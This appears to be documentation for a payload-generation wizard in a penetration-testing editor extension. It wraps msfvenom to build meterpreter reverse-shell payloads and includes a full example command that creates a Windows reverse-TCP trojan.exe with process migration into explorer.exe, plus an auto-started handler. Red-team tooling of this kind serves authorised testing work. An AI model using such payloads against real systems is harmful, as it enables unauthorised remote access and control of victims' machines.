Payload Generation
Interactive MSFVenom payload creation wizard with optional auto-listener.
Command
weapon task: Create msfvenom payloadCommand ID: weapon.task.msfvenom_creation
Interactive Flow
- Select payload type:
windows/x64/meterpreter/reverse_tcp,linux/x64/meterpreter/reverse_tcp, PHP, Python, Java, etc. - Select output format:
exe,elf,psh,dll,hta-psh,raw,jsp,war, etc. - Select advanced options (multi-select):
PrependMigrate=true PrependMigrateProc=explorer.exePrependFork=trueAutoSystemInfo=false
- Specify output filename: Default
./trojan, supports${workspaceFolder}/payloads/shell - Start listener?: Optionally auto-start matching
exploit/multi/handler
Generated Command Example
bash
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=10.10.14.5 LPORT=4444 \
PrependMigrate=true PrependMigrateProc=explorer.exe \
-o ./trojan.exe -f exeConfiguration
| Setting | Description |
|---|---|
weaponized.msf.venom | MSFVenom executable path |
weaponized.lhost | LHOST for reverse connections |
weaponized.lport | LPORT for reverse connections |
Key Files
src/features/tasks/commands/msfvenom.tssrc/features/tasks/terminals/taskTerminal.ts